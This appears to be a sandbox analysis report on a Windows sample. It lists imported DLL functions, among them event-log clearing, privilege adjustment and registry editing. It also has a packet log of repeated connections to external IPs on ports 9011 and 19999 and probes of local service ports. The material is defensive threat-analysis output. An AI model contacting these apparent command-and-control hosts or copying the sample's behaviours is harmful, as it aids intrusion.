ADVAPI32.dll	SetFileSecurityA, RegEnumValueA, RegEnumKeyExA, RegDeleteValueA, RegQueryValueA, RegEnumKeyA, RegCreateKeyExA, RegOpenKeyExW, RegSetValueA, RegDeleteKeyA, CloseEventLog, ClearEventLogA, OpenEventLogA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegSetValueExA, RegOpenKeyExA, RegCloseKey, RegQueryValueExA, RegOpenKeyA, GetUserNameA, GetFileSecurityA
SHELL32.dll	SHGetFileInfoA, ExtractIconA, SHAddToRecentDocs, SHGetPathFromIDListA, SHGetSpecialFolderLocation, SHGetDesktopFolder, DragQueryFileA, DragFinish, SHGetMalloc, SHBrowseForFolderA, ShellExecuteExA, SHAppBarMessage, ShellExecuteA
SHLWAPI.dll	StrStrA, PathIsUNCA, PathStripToRootA, PathFindExtensionA, PathFindFileNameA, PathRemoveExtensionA, PathRemoveFileSpecW, StrFormatKBSizeA, StrStrIA, UrlUnescapeA
UxTheme.dll	GetThemePartSize, IsThemeBackgroundPartiallyTransparent, DrawThemeText, DrawThemeParentBackground, OpenThemeData, IsAppThemed, GetWindowTheme, GetCurrentThemeName, GetThemeColor, DrawThemeBackground, CloseThemeData, GetThemeSysColor
ole32.dll	OleLoad, OleSave, OleSaveToStream, OleCreateStaticFromData, OleCreateLinkFromData, OleCreateFromData, OleCreate, OleSetContainedObject, OleGetIconOfClass, GetHGlobalFromILockBytes, OleCreateFromFile, WriteClassStm, CreateItemMoniker, CreateGenericComposite, OleRegEnumVerbs, OleRegGetMiscStatus, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, CreateILockBytesOnHGlobal, CreateFileMoniker, StgIsStorageFile, StgOpenStorageOnILockBytes, StgOpenStorage, StgCreateDocfile, OleLockRunning, OleSetMenuDescriptor, PropVariantCopy, RevokeDragDrop, OleCreateLinkToFile, CoLockObjectExternal, OleGetClipboard, DoDragDrop, OleIsCurrentClipboard, OleFlushClipboard, OleSetClipboard, CreateStreamOnHGlobal, CoInitializeEx, CoCreateGuid, CoDisconnectObject, StringFromGUID2, SetConvertStg, OleRegGetUserType, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, WriteClassStg, ReadClassStg, CreateBindCtx, CoTreatAsClass, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, CoInitializeSecurity, CoUninitialize, CoInitialize, OleRun, CLSIDFromProgID, CLSIDFromString, CoCreateInstance, CoSetProxyBlanket, RegisterDragDrop, CreateDataAdviseHolder, CreateOleAdviseHolder, GetRunningObjectTable, OleIsRunning, CoGetMalloc, OleQueryLinkFromData, OleQueryCreateFromData, CoFreeUnusedLibraries, OleInitialize, OleUninitialize, CoGetClassObject, CoRegisterClassObject, CoRevokeClassObject, CoRegisterMessageFilter, StgCreateDocfileOnILockBytes
OLEAUT32.dll	SafeArrayLock, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayGetElemsize, SafeArrayGetDim, SafeArrayRedim, SafeArrayDestroy, SafeArrayDestroyData, SafeArrayDestroyDescriptor, SafeArrayCreate, SafeArrayAllocData, SafeArrayAllocDescriptor, VariantTimeToSystemTime, SystemTimeToVariantTime, SysStringLen, SafeArrayUnlock, SysAllocStringLen, VariantInit, VariantClear, SysAllocStringByteLen, SysStringByteLen, SysFreeString, VarDecFromStr, LoadTypeLib, LoadRegTypeLib, RegisterTypeLib, SysAllocString, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayGetElement, VariantChangeType, VarDateFromStr, VarCyFromStr, SafeArrayPutElement, SafeArrayCopy, VariantCopy, SafeArrayPtrOfIndex, VarBstrFromDec, GetErrorInfo, SetErrorInfo, CreateErrorInfo, VarBstrFromCy, VarBstrFromDate, SysReAllocStringLen
WS2_32.dll	gethostname, sendto, gethostbyname, WSAIoctl, WSASend, WSARecv, WSAAccept, WSAEnumNetworkEvents, WSAWaitForMultipleEvents, WSAEventSelect, WSACreateEvent, listen, bind, inet_ntoa, WSASocketA, WSAStartup, WSACleanup, WSACloseEvent, closesocket, send, inet_addr, socket, setsockopt, ioctlsocket, htons, connect, select, recv, ntohs, __WSAFDIsSet, WSAGetLastError
NETAPI32.dll	NetApiBufferFree, NetShareEnum
MPR.dll	WNetCancelConnection2A, WNetAddConnection2A
IPHLPAPI.DLL	GetAdaptersInfo, GetIfTable
WININET.dll	HttpSendRequestA, HttpAddRequestHeadersA, HttpOpenRequestA, GopherGetAttributeA, GopherOpenFileA, GopherFindFirstFileA, GopherCreateLocatorA, FtpCommandA, FtpGetCurrentDirectoryA, FtpSetCurrentDirectoryA, HttpSendRequestExA, FtpCreateDirectoryA, FtpOpenFileA, FtpRenameFileA, FtpDeleteFileA, FtpPutFileA, FtpGetFileA, FtpFindFirstFileA, InternetSetStatusCallback, InternetGetLastResponseInfoA, InternetSetOptionA, InternetQueryOptionA, InternetFindNextFileA, InternetQueryDataAvailable, InternetWriteFile, HttpEndRequestA, HttpQueryInfoA, InternetSetCookieA, InternetGetCookieA, InternetErrorDlg, InternetReadFile, FtpRemoveDirectoryA, InternetOpenUrlA, InternetCrackUrlA, InternetCanonicalizeUrlA, InternetOpenA, InternetCloseHandle, InternetConnectA, InternetSetFilePointer
imagehlp.dll	MakeSureDirectoryPathExists
PSAPI.DLL	GetDeviceDriverBaseNameA, GetModuleFileNameExA, EnumDeviceDrivers
OLEACC.dll	LresultFromObject, AccessibleObjectFromWindow, CreateStdAccessibleObject
gdiplus.dll	GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipCreateBitmapFromHBITMAP, GdiplusShutdown, GdipAlloc, GdipFree, GdiplusStartup, GdipDrawImageI, GdipDisposeImage, GdipGetImageGraphicsContext, GdipGetImageWidth, GdipGetImageHeight, GdipGetImagePixelFormat, GdipGetImagePalette, GdipGetImagePaletteSize, GdipCreateBitmapFromStream, GdipCreateBitmapFromFile, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromFileICM, GdipCreateBitmapFromScan0, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipDeleteGraphics, GdipCloneImage
IMM32.dll	ImmGetOpenStatus, ImmGetContext, ImmReleaseContext
WINMM.dll	PlaySoundA
oledlg.dll

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 14, 2024 16:38:56.309005022 CEST	49674	443	192.168.2.5	23.1.237.91
Jun 14, 2024 16:38:56.309019089 CEST	49675	443	192.168.2.5	23.1.237.91
Jun 14, 2024 16:38:56.402774096 CEST	49673	443	192.168.2.5	23.1.237.91
Jun 14, 2024 16:39:00.879741907 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:00.884721994 CEST	9011	49705	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:00.885036945 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:00.885745049 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:00.890544891 CEST	9011	49705	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:00.935811043 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:00.940643072 CEST	9011	49705	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:01.093034983 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:01.097906113 CEST	9011	49705	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:01.232198954 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:01.237181902 CEST	9011	49705	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:01.380815983 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:01.385839939 CEST	9011	49705	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:01.538271904 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:01.543087006 CEST	9011	49705	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:01.591876030 CEST	9011	49705	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:01.591979980 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:01.620064020 CEST	49705	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:05.913661003 CEST	49706	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:05.918694973 CEST	19999	49706	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:05.918762922 CEST	49706	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:05.936348915 CEST	49706	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:05.941364050 CEST	19999	49706	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:05.965230942 CEST	49674	443	192.168.2.5	23.1.237.91
Jun 14, 2024 16:39:06.001141071 CEST	49675	443	192.168.2.5	23.1.237.91
Jun 14, 2024 16:39:06.012756109 CEST	49706	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:06.105855942 CEST	49673	443	192.168.2.5	23.1.237.91
Jun 14, 2024 16:39:06.699285984 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:06.704200029 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:06.704288006 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:06.704937935 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:06.709764957 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:06.740979910 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:06.745786905 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:06.875514030 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:06.880347013 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:07.026880980 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:07.032248020 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:07.159477949 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:07.164246082 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:07.285486937 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:07.290590048 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:07.401671886 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:07.401727915 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:07.401818991 CEST	49707	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:07.406685114 CEST	9011	49707	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:07.764041901 CEST	443	49703	23.1.237.91	192.168.2.5
Jun 14, 2024 16:39:07.765178919 CEST	49703	443	192.168.2.5	23.1.237.91
Jun 14, 2024 16:39:09.558871984 CEST	49708	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:09.563671112 CEST	19999	49708	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:09.563750029 CEST	49708	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:09.564318895 CEST	49708	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:09.569118023 CEST	19999	49708	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:09.607959986 CEST	49708	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:11.891012907 CEST	49709	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:11.897037029 CEST	19999	49709	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:11.899477959 CEST	49709	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:11.899523020 CEST	49709	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:11.904887915 CEST	19999	49709	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:12.000947952 CEST	49709	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:12.489694118 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:12.494555950 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:12.495399952 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:12.509113073 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:12.513982058 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:12.574330091 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:12.579163074 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:12.716963053 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:12.721810102 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:12.850732088 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:12.855866909 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:12.922126055 CEST	49713	19490	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:12.993206978 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:12.998282909 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:13.020951033 CEST	49724	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:13.025778055 CEST	19999	49724	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:13.025841951 CEST	49724	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:13.025928020 CEST	49724	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:13.030883074 CEST	19999	49724	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:13.057750940 CEST	49724	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:13.126760960 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:13.131716967 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:13.217572927 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:13.217637062 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:13.217740059 CEST	49710	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:13.222599030 CEST	9011	49710	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:13.980825901 CEST	49713	19490	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:16.016144991 CEST	49888	135	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:16.074575901 CEST	49713	19490	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:17.197350979 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:17.197452068 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:17.197535992 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:17.198121071 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:17.198163033 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:17.216510057 CEST	49888	135	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:18.256509066 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.262198925 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.262269974 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.262917995 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.267679930 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.347917080 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.355511904 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:18.355621099 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:18.355815887 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.370610952 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:18.370706081 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:18.371738911 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:18.462903976 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.468265057 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.512201071 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:18.584707022 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.589620113 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.705235004 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.710345984 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.826750994 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.831945896 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.947468996 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.952507973 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.968374014 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:18.968554974 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.968554974 CEST	50107	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:18.973670006 CEST	9011	50107	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:19.044028997 CEST	50172	1433	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:19.232566118 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.280495882 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.622801065 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.622867107 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.622888088 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.622906923 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.622946024 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.622946024 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.622970104 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.623027086 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.623027086 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.623027086 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.623065948 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.623102903 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.623120070 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.623126984 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.623147011 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.623156071 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.623176098 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.623181105 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.623225927 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.623244047 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.715246916 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:19.754028082 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.754103899 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:19.754261017 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:20.168957949 CEST	50172	1433	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:20.663332939 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:20.663333893 CEST	50015	443	192.168.2.5	40.127.169.103
Jun 14, 2024 16:39:20.663381100 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:20.663410902 CEST	443	50015	40.127.169.103	192.168.2.5
Jun 14, 2024 16:39:22.059870958 CEST	50428	21	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:23.215255022 CEST	50428	21	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:23.377870083 CEST	49703	443	192.168.2.5	23.1.237.91
Jun 14, 2024 16:39:23.383352995 CEST	443	49703	23.1.237.91	192.168.2.5
Jun 14, 2024 16:39:24.020059109 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.025163889 CEST	9011	50598	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:24.025479078 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.025835037 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.030808926 CEST	9011	50598	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:24.049273014 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.054722071 CEST	9011	50598	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:24.284775972 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.291135073 CEST	9011	50598	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:24.398439884 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.403376102 CEST	9011	50598	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:24.540515900 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.545470953 CEST	9011	50598	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:24.663417101 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.668346882 CEST	9011	50598	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:24.729315042 CEST	9011	50598	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:24.729372978 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:24.792506933 CEST	50598	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:25.081167936 CEST	50683	19490	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:26.215234995 CEST	50683	19490	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:27.538790941 CEST	50906	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:27.543967962 CEST	19999	50906	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:27.544028997 CEST	50906	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:27.545340061 CEST	50906	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:27.550319910 CEST	19999	50906	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:27.582068920 CEST	50906	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:28.104022026 CEST	50947	80	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:29.168387890 CEST	50947	80	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:29.901148081 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:29.906055927 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:29.906140089 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:29.906661987 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:29.911541939 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:29.957864046 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:29.965078115 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:30.065860987 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:30.070805073 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:30.176894903 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:30.181865931 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:30.288681984 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:30.293870926 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:30.415653944 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:30.420737982 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:30.547194004 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:30.552320004 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:30.603163958 CEST	9011	51145	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:30.603339911 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:30.645347118 CEST	51145	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:31.168380976 CEST	50947	80	192.168.2.5	192.168.2.1
Jun 14, 2024 16:39:34.615439892 CEST	51525	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:34.622847080 CEST	19999	51525	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:34.622920036 CEST	51525	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:34.633620024 CEST	51525	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:34.638698101 CEST	19999	51525	159.69.83.232	192.168.2.5
Jun 14, 2024 16:39:34.640760899 CEST	51525	19999	192.168.2.5	159.69.83.232
Jun 14, 2024 16:39:35.635111094 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:35.639921904 CEST	9011	51531	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:35.640007973 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:35.640923023 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:35.645859957 CEST	9011	51531	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:35.764317036 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:35.769146919 CEST	9011	51531	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:35.881268978 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:35.886044025 CEST	9011	51531	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:36.019915104 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:36.025422096 CEST	9011	51531	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:36.197705984 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:36.202836990 CEST	9011	51531	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:36.337770939 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:36.342544079 CEST	9011	51531	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:36.352883101 CEST	9011	51531	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:36.352932930 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:36.366296053 CEST	51531	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:37.983009100 CEST	51532	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:37.988010883 CEST	19999	51532	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:37.988173008 CEST	51532	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:37.988325119 CEST	51532	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:37.993602991 CEST	19999	51532	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:38.019335985 CEST	51532	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:40.413113117 CEST	51533	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:40.417906046 CEST	19999	51533	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:40.417994976 CEST	51533	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:40.418165922 CEST	51533	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:40.422902107 CEST	19999	51533	195.201.97.156	192.168.2.5
Jun 14, 2024 16:39:40.438848972 CEST	51533	19999	192.168.2.5	195.201.97.156
Jun 14, 2024 16:39:40.713414907 CEST	51534	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:40.718849897 CEST	19999	51534	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:40.718921900 CEST	51534	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:40.720067978 CEST	51534	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:40.724900961 CEST	19999	51534	88.198.117.174	192.168.2.5
Jun 14, 2024 16:39:40.741880894 CEST	51534	19999	192.168.2.5	88.198.117.174
Jun 14, 2024 16:39:41.392810106 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:41.397578001 CEST	9011	51535	218.244.58.70	192.168.2.5
Jun 14, 2024 16:39:41.397633076 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:41.398511887 CEST	51535	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:39:41.403269053 CEST	9011	51535	218.244.58.70	192.168.2.5
